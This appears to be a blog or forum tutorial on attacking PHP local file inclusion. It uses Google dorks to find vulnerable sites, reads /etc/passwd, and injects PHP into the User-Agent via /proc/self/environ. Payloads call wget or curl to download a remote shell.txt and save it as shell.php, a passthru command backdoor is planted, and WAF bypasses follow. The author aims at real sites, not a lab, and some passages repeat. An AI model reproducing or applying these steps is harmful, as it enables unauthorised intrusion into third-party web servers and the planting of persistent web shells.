A vulnerable link looks something like this:
Code:
www.site.com/index.php?page=/etc/passwd
Here's what the code looks like that makes it vulnerable.
Code:
<?php
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
First off, you're going to need a few things.
1. FireFox
2. Tamper Data
3. Vulnerable Sites
If you can't find any good ones from those lists, use google dorks to find some.
Here's a few dorks.
Code:
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=
inurl:index.php?page=
inurl:index.php?index2=
I'm going to be showing you how to exploit LFI and get your shell uploaded via /proc/self/environ
So after you got your site, try checking if you can access /etc/passwd.
Your page should come up with something that looks like this.
Good, now we know that site is vulnerable.
Now we need to check for /proc/self/environ
So change your path to /proc/self/environ
Your page should look something like this if the file exists, not all sites have it.
http://i.imgur.com/23eiv.png
The part we're interested in, is the HTTP_USER_AGENT. We're going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.
To do this, we're going to use tamperdata. Once you have it installed, go to your options, and go down into TamperData.
The part we're interested in, is the HTTP_USER_AGENT. We're going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.
To do this, we're going to use tamperdata. Once you have it installed, go to your options, and go down into TamperData.
Now you should have a window that looks like this.
http://i.imgur.com/BjBY1.png
So your page should still be /proc/self/environ
Click Start Tamper, and refresh your page.
We're going to try some code injection.
After you start tampering, you should see a window that looks something like this:
So your page should still be /proc/self/environ
Click Start Tamper, and refresh your page.
We're going to try some code injection.
After you start tampering, you should see a window that looks something like this:
http://i.imgur.com/hulSq.png
In the User-Agent field, type:
In the User-Agent field, type:
Code:
<?php phpinfo();?>
Now when your site is down loading, you should get an image that looks something like this if you did it correctly.
Now we know we can execute code, so let's get our shell uploaded using wget.
Open TamperData again, click start tamper, and refresh your site. This time, on the User-Agent enter this:
Code:
<?exec('wget http://www.site.com/shell.txt -O
shell.php');?>
It should look like this:
This downloads that text file, and renames it as a php file (your shell).
You can upload your shell as a text file using free webhosting...I already shelled a site, so I'm gonna use that site as file hosting.
Once you're done with that, you can try and access your shell directly by going to site/shell.php
If you get an error, try using the same method as when you got your vulnerable link.
Example:
Code:
http://www.site.com/index.php?page=/etc/passwd
Load your shell by using the same method.
Code:
http://www.site.com/index.php?page=shell.php
If it loads fine the second time, you can upload a file using your shell to directly access it.
When you're all done, you have a sexy shell, kinda like this :3
Alternate Methods
Sometimes sites will take extra precaution to prevent attacks like these.
Here is an alternate method.
Change your user agent to:
Code:
<? passthru($_GET['cmd']); ?>
Now load your url as:
Code:
/proc/self/environ?cmd=curl
http://www.yoursite.com/shell.txt -o shell.php
So your url should look like:
Code:
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl
http://www.yoursite.com/shell.txt -o shell.php
Now hopefully you got around it, and got your shell uploaded.
Special thanks to Hooded Robin for all the help he's given me with LFI.
I recommend you take a look at his video tutorial using Burp Suite.
You can check it out Here
Thanks alot <3
If you guys need anything, post here or feel free to PM me. I'll get back to you as soon as I can.
Filter Evasion
As you know, some sites have Web Application Firewalls, or WAFs installed. In order to bypass these, here's a few techniques you can try.
Null Bytes
Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
Example:
Code:
http://www.site.com/index.php?page=/etc/passwd
It's pretty basic.
URL Encoding.
Here's another method, url encoding.
Encode your slashes, or unallowed characters to bypass these.
Code:
http://www.site.com/index.php?page=%2fetc%2fpasswd
Posts
![SQL Injection Basics - Union Based [Detailed Tutorial]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjQpa2wuMB-m5CXPVf71GUOkfiIOQA8KTyQ-_zfAl0SZa23UBN1QJaO2ZMGRDZlmDJTYf2jJ4ik3Xnj1locc38Yv9l6VMxTWt32s86JtXtLABDn20DRuAcbLPKMb9m2hc6PDmjIjvU-us/s72-c/SQL-Injection-Attack.jpg)
No comments:
Post a Comment